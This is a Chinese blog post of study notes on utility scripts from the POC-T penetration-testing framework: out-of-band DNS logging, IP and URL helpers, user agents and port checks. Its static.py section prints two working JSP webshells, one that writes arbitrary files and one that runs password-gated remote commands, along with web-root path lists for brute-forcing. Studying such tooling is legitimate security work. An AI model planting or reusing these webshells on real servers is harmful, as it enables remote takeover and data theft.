from lib.utils.config import ConfigFileParser# load once for all thread
key = ConfigFileParser().CloudEyeApikey()
uniq_domain = ConfigFileParser().ColudEyePersonaldomain().split('.')[0]class CloudEye:def __init__(self):self.unique = uniq_domainself.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])def getRandomDomain(self, custom='poc'):"""full domain = [random].[custom].[unique].dnslog.infoe.g. fezarvgo.poc.ee8a6f.dnslog.info"""self.custom = customreturn '%s.%s.%s.dnslog.info' % (self.random, self.custom, self.unique)def getDnsRecord(self, delay=2):time.sleep(delay)query = self.random + '.' + self.customapi_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=query)return requests.post(api_base).contentdef getHttpRecord(self, delay=2):time.sleep(delay)query = self.random + '.' + self.customapi_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=query)return requests.post(api_base).contentdef verifyDNS(self, delay=2):return 'dnslog.info' in self.getDnsRecord(delay)def verifyHTTP(self, delay=2):return 'dnslog.info' in self.getHttpRecord(delay)def queryDnsRecord(domain, delay=2):time.sleep(delay)domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.')api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=domain)return requests.post(api_base).contentdef queryHttpRecord(domain, delay=2):time.sleep(delay)domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.')api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=domain)return requests.post(api_base).content

3、extracts.py（IP处理）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport re
import requestsdef getIP(content, remove_duplicate=True, remove_private=False):"""Functions to extract IP from content stringparameters：contentremove_duplicate  (default:true)remove_private    (default:False)usage:from lib.util.extracts import *ip_list = getIP(content)private address:10.0.0.0 - 10.255.255.255172.16.0.0 - 172.31.255.255192.168.0.0 - 192.168.255.255127.0.0.0 - 127.255.255.255example:> print getIP('ffeac12.2.2.2asf^&10.10\n.1.1ffa2\n')['12.2.2.2','10.10.1.1']"""def _isPrivateIP(strict_IP):p1 = re.compile(r'^10\.|^172\.(?:1[6789]|2\d|31)\.|^192\.168\.|^127\.')return True if re.match(p1, strict_IP) else Falsecontent = content.replace('\n', ',')p = re.compile(r'(?:(?:2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(?:2[0-4]\d|25[0-5]|[01]?\d\d?)')_ = re.findall(p, content)ans = list(set(_)) if remove_duplicate else _if remove_private:for each in ans:if _isPrivateIP(each):ans.remove(each)return ansdef getTitle(input):"""Get title from html-content/ip/url:param input:html-content OR ip OR url:return text in <title>:except return string:'NULL'"""try:if '<title>' in input:content = inputelse:url = 'http://' + input if '://' not in input else inputcontent = requests.get(url,timeout=3).contentreturn re.findall('<title>([\s\S]*)</title>', content)[0].strip()except Exception:return ''

4、static.py（静态文本：端口、linux|windows的物理路径、upload等）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meclass ABSPATH_PREFIXES:LINUX = ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24","/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/vhosts","/var/www/virtual", "/var/www/clients/vhosts", "/var/www/clients/virtual")WINDOWS = ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache","/Program Files/Apache Group/Apache","/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2","/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot","/Inetpub/vhosts")ALL = LINUX + WINDOWS# Suffixes used in brute force search for web server document root
ABSPATH_SUFFIXES = ("html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all","www/build")JSP_UPLOAD = """<%@page contentType="text/html; charset=GBK" import="java.io.*;"%>
<html><head><title>JSP</title></head><body bgcolor="#ffffff">
<%
String path=request.getParameter("path");
String content=request.getParameter("content");
String url=request.getRequestURI();
String relativeurl=url.substring(url.indexOf('/',1));
String absolutepath=application.getRealPath(relativeurl);
if (path!=null && !path.equals("") && content!=null && !content.equals("")){try{File newfile=new File(path);PrintWriter writer=new PrintWriter(newfile);writer.println(content);writer.close();if (newfile.exists() && newfile.length()>0){out.println("<font size=3 color=red>save success!</font>");}else{out.println("<font size=3 color=red>save failed!</font>");}}catch(Exception e){e.printStackTrace();}
}
out.println("<form action="+url+" method=post>");
out.println("<font size=3>save path:<br></font><input type=text size=54 name='path'><br>");
out.println("<font size=3 color=red>current path "+absolutepath+"</font><br>");
out.println("<textarea name='content' rows=15 cols=100></textarea><br>");
out.println("<input type='submit' value='save!'>");
out.println("</form>");
%>
</body></html>"""JSP_RCE = """<%if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");}
%>"""NMAP_PORTS_1000 = \['1', '3', '4', '6', '7', '9', '13', '17', '19', '20', '21', '22', '23', '24', '25', '26', '30', '32', '33','37', '42', '43', '49', '53', '70', '79', '80', '81', '82', '83', '84', '85', '88', '89', '90', '99', '100','106', '109', '110', '111', '113', '119', '125', '135', '139', '143', '144', '146', '161', '163', '179', '199','211', '212', '222', '254', '255', '256', '259', '264', '280', '301', '306', '311', '340', '366', '389', '406','407', '416', '417', '425', '427', '443', '444', '445', '458', '464', '465', '481', '497', '500', '512', '513','514', '515', '524', '541', '543', '544', '545', '548', '554', '555', '563', '587', '593', '616', '617', '625','631', '636', '646', '648', '666', '667', '668', '683', '687', '691', '700', '705', '711', '714', '720', '722','726', '749', '765', '777', '783', '787', '800', '801', '808', '843', '873', '880', '888', '898', '900', '901','902', '903', '911', '912', '981', '987', '990', '992', '993', '995', '999', '1000', '1001', '1002', '1007','1009', '1010', '1011', '1021', '1022', '1023', '1024', '1025', '1026', '1027', '1028', '1029', '1030', '1031','1032', '1033', '1034', '1035', '1036', '1037', '1038', '1039', '1040', '1041', '1042', '1043', '1044', '1045','1046', '1047', '1048', '1049', '1050', '1051', '1052', '1053', '1054', '1055', '1056', '1057', '1058', '1059','1060', '1061', '1062', '1063', '1064', '1065', '1066', '1067', '1068', '1069', '1070', '1071', '1072', '1073','1074', '1075', '1076', '1077', '1078', '1079', '1080', '1081', '1082', '1083', '1084', '1085', '1086', '1087','1088', '1089', '1090', '1091', '1092', '1093', '1094', '1095', '1096', '1097', '1098', '1099', '1100', '1102','1104', '1105', '1106', '1107', '1108', '1110', '1111', '1112', '1113', '1114', '1117', '1119', '1121', '1122','1123', '1124', '1126', '1130', '1131', '1132', '1137', '1138', '1141', '1145', '1147', '1148', '1149', '1151','1152', '1154', '1163', '1164', '1165', '1166', '1169', '1174', '1175', '1183', '1185', '1186', '1187', '1192','1198', '1199', '1201', '1213', '1216', '1217', '1218', '1233', '1234', '1236', '1244', '1247', '1248', '1259','1271', '1272', '1277', '1287', '1296', '1300', '1301', '1309', '1310', '1311', '1322', '1328', '1334', '1352','1417', '1433', '1434', '1443', '1455', '1461', '1494', '1500', '1501', '1503', '1521', '1524', '1533', '1556','1580', '1583', '1594', '1600', '1641', '1658', '1666', '1687', '1688', '1700', '1717', '1718', '1719', '1720','1721', '1723', '1755', '1761', '1782', '1783', '1801', '1805', '1812', '1839', '1840', '1862', '1863', '1864','1875', '1900', '1914', '1935', '1947', '1971', '1972', '1974', '1984', '1998', '1999', '2000', '2001', '2002','2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2013', '2020', '2021', '2022', '2030', '2033','2034', '2035', '2038', '2040', '2041', '2042', '2043', '2045', '2046', '2047', '2048', '2049', '2065', '2068','2099', '2100', '2103', '2105', '2106', '2107', '2111', '2119', '2121', '2126', '2135', '2144', '2160', '2161','2170', '2179', '2190', '2191', '2196', '2200', '2222', '2251', '2260', '2288', '2301', '2323', '2366', '2381','2382', '2383', '2393', '2394', '2399', '2401', '2492', '2500', '2522', '2525', '2557', '2601', '2602', '2604','2605', '2607', '2608', '2638', '2701', '2702', '2710', '2717', '2718', '2725', '2800', '2809', '2811', '2869','2875', '2909', '2910', '2920', '2967', '2968', '2998', '3000', '3001', '3003', '3005', '3006', '3007', '3011','3013', '3017', '3030', '3031', '3052', '3071', '3077', '3128', '3168', '3211', '3221', '3260', '3261', '3268','3269', '3283', '3300', '3301', '3306', '3322', '3323', '3324', '3325', '3333', '3351', '3367', '3369', '3370','3371', '3372', '3389', '3390', '3404', '3476', '3493', '3517', '3527', '3546', '3551', '3580', '3659', '3689','3690', '3703', '3737', '3766', '3784', '3800', '3801', '3809', '3814', '3826', '3827', '3828', '3851', '3869','3871', '3878', '3880', '3889', '3905', '3914', '3918', '3920', '3945', '3971', '3986', '3995', '3998', '4000','4001', '4002', '4003', '4004', '4005', '4006', '4045', '4111', '4125', '4126', '4129', '4224', '4242', '4279','4321', '4343', '4443', '4444', '4445', '4446', '4449', '4550', '4567', '4662', '4848', '4899', '4900', '4998','5000', '5001', '5002', '5003', '5004', '5009', '5030', '5033', '5050', '5051', '5054', '5060', '5061', '5080','5087', '5100', '5101', '5102', '5120', '5190', '5200', '5214', '5221', '5222', '5225', '5226', '5269', '5280','5298', '5357', '5405', '5414', '5431', '5432', '5440', '5500', '5510', '5544', '5550', '5555', '5560', '5566','5631', '5633', '5666', '5678', '5679', '5718', '5730', '5800', '5801', '5802', '5810', '5811', '5815', '5822','5825', '5850', '5859', '5862', '5877', '5900', '5901', '5902', '5903', '5904', '5906', '5907', '5910', '5911','5915', '5922', '5925', '5950', '5952', '5959', '5960', '5961', '5962', '5963', '5987', '5988', '5989', '5998','5999', '6000', '6001', '6002', '6003', '6004', '6005', '6006', '6007', '6009', '6025', '6059', '6100', '6101','6106', '6112', '6123', '6129', '6156', '6346', '6389', '6502', '6510', '6543', '6547', '6565', '6566', '6567','6580', '6646', '6666', '6667', '6668', '6669', '6689', '6692', '6699', '6779', '6788', '6789', '6792', '6839','6881', '6901', '6969', '7000', '7001', '7002', '7004', '7007', '7019', '7025', '7070', '7100', '7103', '7106','7200', '7201', '7402', '7435', '7443', '7496', '7512', '7625', '7627', '7676', '7741', '7777', '7778', '7800','7911', '7920', '7921', '7937', '7938', '7999', '8000', '8001', '8002', '8007', '8008', '8009', '8010', '8011','8021', '8022', '8031', '8042', '8045', '8080', '8081', '8082', '8083', '8084', '8085', '8086', '8087', '8088','8089', '8090', '8093', '8099', '8100', '8180', '8181', '8192', '8193', '8194', '8200', '8222', '8254', '8290','8291', '8292', '8300', '8333', '8383', '8400', '8402', '8443', '8500', '8600', '8649', '8651', '8652', '8654','8701', '8800', '8873', '8888', '8899', '8994', '9000', '9001', '9002', '9003', '9009', '9010', '9011', '9040','9050', '9071', '9080', '9081', '9090', '9091', '9099', '9100', '9101', '9102', '9103', '9110', '9111', '9200','9207', '9220', '9290', '9415', '9418', '9485', '9500', '9502', '9503', '9535', '9575', '9593', '9594', '9595','9618', '9666', '9876', '9877', '9878', '9898', '9900', '9917', '9929', '9943', '9944', '9968', '9998', '9999','10000', '10001', '10002', '10003', '10004', '10009', '10010', '10012', '10024', '10025', '10082', '10180','10215', '10243', '10566', '10616', '10617', '10621', '10626', '10628', '10629', '10778', '11110', '11111','11967', '12000', '12174', '12265', '12345', '13456', '13722', '13782', '13783', '14000', '14238', '14441','14442', '15000', '15002', '15003', '15004', '15660', '15742', '16000', '16001', '16012', '16016', '16018','16080', '16113', '16992', '16993', '17877', '17988', '18040', '18101', '18988', '19101', '19283', '19315','19350', '19780', '19801', '19842', '20000', '20005', '20031', '20221', '20222', '20828', '21571', '22939','23502', '24444', '24800', '25734', '25735', '26214', '27000', '27352', '27353', '27355', '27356', '27715','28201', '30000', '30718', '30951', '31038', '31337', '32768', '32769', '32770', '32771', '32772', '32773','32774', '32775', '32776', '32777', '32778', '32779', '32780', '32781', '32782', '32783', '32784', '32785','33354', '33899', '34571', '34572', '34573', '35500', '38292', '40193', '40911', '41511', '42510', '44176','44442', '44443', '44501', '45100', '48080', '49152', '49153', '49154', '49155', '49156', '49157', '49158','49159', '49160', '49161', '49163', '49165', '49167', '49175', '49176', '49400', '49999', '50000', '50001','50002', '50003', '50006', '50300', '50389', '50500', '50636', '50800', '51103', '51493', '52673', '52822','52848', '52869', '54045', '54328', '55055', '55056', '55555', '55600', '56737', '56738', '57294', '57797','58080', '60020', '60443', '61532', '61900', '62078', '63331', '64623', '64680', '65000', '65129', '65389']

5、urlparser.py（URL解析）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport urlparsedef get_domain(url):"""added by cdxy May 8 Sun,2016Use:get_domain('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')Return:'http://cdxy.me:80'"""p = urlparse.urlparse(url)return urlparse.urlunsplit([p.scheme, p.netloc, '', '', ''])def iterate_path(ori_str):"""added by cdxy May 8 Sun,2016Use:iterate_path_to_list('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')Return:['http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#','http://cdxy.me:80/''http://cdxy.me:80/cdsa','http://cdxy.me:80/cdsa/cda','http://cdxy.me:80/cdsa/cda/aaa.jsp']"""parser = urlparse.urlparse(ori_str)_path_list = parser.path.replace('//', '/').strip('/').split('/')_ans_list = set()_ans_list.add(ori_str)if not _path_list[0]:return _ans_list_ans_list.add(get_domain(ori_str))s = ''for each in _path_list:s += '/' + each_ans_list.add(urlparse.urljoin(ori_str, s))return _ans_listif __name__ == '__main__':url = 'http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#'print urlparse.urlparse(url)print get_domain(url)for each in iterate_path(url):print each

6、useragent.py（各大浏览器的UA）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me"""
Functions to get user-agent string
edit by cdxy [i@cdxy.me]
May 9 Mon, 2016usage:
from plugin.useragent import *
str1 = get_random_agent()
str2 = firefox()
str3 = iphone()
str4 = google_bot()
...tips:
init_UAlist(),get_random_agent()
these 2 methods should be called after [path-init-method] in lib.core.common
"""import random
from lib.core.data import conf, th, paths, logger
from lib.core.common import getFileItemsdef _init_UAlist(path):infoMsg = "loading HTTP User-Agent header(s) from "infoMsg += "file '%s'" % pathlogger.info(infoMsg)# TODO 此处 conf.RANDOM_UA 在其他地方暂时没有用到conf.RANDOM_UA = Trueth.UA_LIST = getFileItems(path)successMsg = "Total: %d" % len(th.UA_LIST)logger.info(successMsg)def get_random_agent(path=paths.UA_LIST_PATH):if "UA_LIST" not in th:_init_UAlist(path)try:return random.sample(th.UA_LIST, 1)[0]except IOError, e:warnMsg = "unable to read HTTP User-Agent header "warnMsg += "file '%s'" % pathlogger.warning(warnMsg)returndef firefox():return 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'def ie():return 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)'def chrome():return 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30'def opera():return 'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50'def iphone():return 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16'def google_bot():return 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'def msn_bot():return 'msnbot/1.1 (+http://search.msn.com/msnbot.htm)'def yahoo_bot():return 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'

7、util.py（随机数、URL重定向、URL转IP地址、IP转域名、端口开发检查）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport random
import hashlib
import requests
import socket
import re
from string import ascii_lowercase, digits
from urlparse import urlparsedef randomString(length=8):"""生成随机字母串:param length:生成字符串长度:return 字母串"""return ''.join([random.choice(ascii_lowercase) for _ in range(length)])def randomDigits(length=8):"""生成随机数字串:param length:生成字符串长度:return 数字串"""return ''.join([random.choice(digits) for _ in range(length)])def randomMD5(length=10, hex=True):"""生成随机MD5键值对:param length:指定明文长度:param hex:指定密文长度为32位:returns 原文，密文(32位或16位)"""plain = randomDigits(length)m = hashlib.md5()m.update(plain)cipher = m.hexdigest() if hex else m.hexdigest()[8:-8]return [plain, cipher]def redirectURL(url, timeout=3):"""获取跳转后的真实URL:param url:原始URL:param timeout:超时时间:return 跳转后的真实URL"""try:url = url if '://' in url else 'http://' + urlr = requests.get(url, allow_redirects=False, timeout=timeout)return r.headers.get('location') if r.status_code == 302 else urlexcept Exception:return urldef host2IP(url):"""URL转IP:param url:原始URL:return IP:PORT:except 返回原始URL"""for offset in url:if offset.isalpha():breakelse:return urltry:url = url if '://' in url else 'http://' + url  # to get netlocurl = urlparse(url).netlocans = [i for i in socket.getaddrinfo(url.split(':')[0], None)[0][4] if i != 0][0]if ':' in url:ans += ':' + url.split(':')[1]return ansexcept Exception:return urldef IP2domain(base, timeout=3):"""IP转域名:param base:原始IP:param timeout:超时时间:return 域名 / False:except 返回False"""try:domains = set()ip = base.split(':')[0] if ':' in base else baseq = "https://www.bing.com/search?q=ip%3A" + ipc = requests.get(url=q,headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'},timeout=timeout).contentp = re.compile(r'<cite>(.*?)</cite>')l = re.findall(p, c)for each in l:domain = each.split('://')[-1].split('/')[0]domains.add(domain)if len(domains) > 0:ans_1 = base + ' -> 'for each in domains:ans_1 += '|' + eachreturn ans_1else:return Falseexcept Exception:return Falsedef checkPortTcp(target, port, timeout=3):"""检查端口是否开放:param target:目标IP:param port:目标端口:param timeout:超时时间:return True / False:except 返回False"""sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sk.settimeout(timeout)try:sk.connect((target, port))return Trueexcept Exception:return False

未完，待续！

POC-T框架学习————7、相关脚本深入学习三相关推荐

1. POC-T框架学习————9、相关脚本深入学习五

   script目录----整个POC的存放地方,也是该项目的一个重点 因为涉及的POC脚本比较多,我们接下来就简单的去介绍几个: 1.activemq-weakpass.py(Apache Active ...

2. POC-T框架学习————8、相关脚本深入学习四

   thirdparty(第三方库或者脚本文件) ansistrm子目录 1.ansistrm.py(颜色.format等设置) # # Copyright (C) 2010-2012 Vinay Saj ...

3. 学习笔记-FRIDA脚本系列（三）

   FRIDA脚本系列(三)超神篇:百度AI"调教"抖音AI 0x01. 日本抖音美如画 0x02. 如何让抖音AI更加"智能" 点赞&关注&上滑& ...

4. 驱动框架6——linux内核的gpiolib学习

   以下内容源于朱有鹏<物联网大讲堂>课程的学习整理,如有侵权,请告知删除. 八.linux内核的gpiolib学习1 1.gpiolib学习重点(主线) (1)主线一:gpiolib的建立过 ...

5. shell脚本编程学习笔记8(XDL)——流程控制和循环

   shell脚本编程学习笔记8--流程控制和循环 1,if语句 1,框架 1,单分支:if [条件判断式] ;thenprogramfiif [条件判断式]thenprogramfi注意:if语句使用f ...

6. shell脚本编程学习笔记2(xdl)——Bash变量

   shell脚本编程学习笔记2--Bash变量 1,变量简介 1,计算机内存单元2,设置规则字母数组下划线组成,不能以数字开头Bash中,默认类型字符串型,变量类型可修改 2,Bash变量规则 1,变量 ...

7. 从零开始学习TradingView Pine脚本编程

   从零开始学习TradingView Pine脚本编程 构建你自己的指标.信号发生器和自动化交易逻辑 课程英文名:Learn TradingView Pine Script Programming Fr ...

8. php的laravel框架下载,PHP 之 Laravel 框架安装及相关开源软件

   Laravel 被称为简洁.优雅的PHP开发框架,但第一次接触此框架的人有不少都卡在了安装上,其实在 Linux 下只需要很简单的几步就可以搞定,这里我们以 CentOS 下 PHP + Nginx ...

9. 【GIS人必学】零基础学习ArcGIS Python脚本开发训练营来了

   Python作为一种高级程序设计语言,凭借其简洁.易读及可扩展性日渐成为程序设计领域备受推崇的语言.ArcGIS软件由于其面向地理问题的科学理念,不断创新的技术方法,已在国内外市场占据了主导地位.Py ...

10. 深圳云计算培训：怎么样学习云计算相关技术？

    深圳云计算培训:怎么样学习云计算相关技术? 云计算是很适合小白学习的一门课程,不需要你的英语能力有多好,你也可以直接不懂云计算是什么,但是你要具备一个好的学习态度,那就够了. 学习云计算得从基础开始, ...

最新文章

1. spring的BeanWrapper类的原理和使用方法
2. Rust初步（三）：使用atom搭配racer进行rust编程
3. 再破纪录！ECCV 2020 旷视研究院15篇成果总览
4. 关于Python Profilers性能分析器
5. js 判断日期时间差
6. Java中去除字符串中空格的方法
7. uboot网络调试方法
8. linux+nginx+mysql+php的简单配置
9. 190610每日一句，如果你想变得更加强大，你该问问自己这个问题；失败造就了成功
10. acc 蓝牙_蓝牙中的三种音频编码：Apt-X、SBC、AAC，请问分别有什么区别？
11. 韩顺平oracle教学笔记,韩顺平oracle视频笔记一
12. js 直接打开选择文件窗口_【网络爬虫教学】一分钟带你快速寻找JS加密入口（二）...
13. 简历javaweb项目描述怎么写_从事java开发工作简历怎样写工作描述
14. 如何解决Access denied for user ''@'localhost' (using password: NO)错误
15. CS5801HDMI转EDP转换器芯片参考资料|CS5801HDMI转EDP转换方案说明
16. MacOS 苹果 快捷键
17. The word 'XXX' is not correctly spelled
18. 特刊|离子阱量子计算简史
19. 广东计算机专a院校,广东大专院校排名_广东省专A/专B院校排名
20. php 长链接变为短链接,长链接转短链接原理

热门文章

1. 软件项目版本管理规范总结
2. 【机器学习入门】(6) 随机森林算法：原理、实例应用（沉船幸存者预测）附python完整代码和数据集
3. 华为推送-华为PUSH SDK Android版接入方法
4. 安卓Android类原生系统官网集合
5. Sniffer Pro 4.7.5注册不成功问题（unable to communicate with server）
6. 蒙特卡洛泊松分布matlab,泊松分布在MATLAB中那些代码是什么意思啊
7. 从有赞UI组件库看CSS BEM命名规范的好处
8. 自己制作并发布720°VR全景图
9. ARM PWN基础教程
10. maxscale mysql 主从_orchestrator+maxscale+mysql5.7GTID主从切换测试过程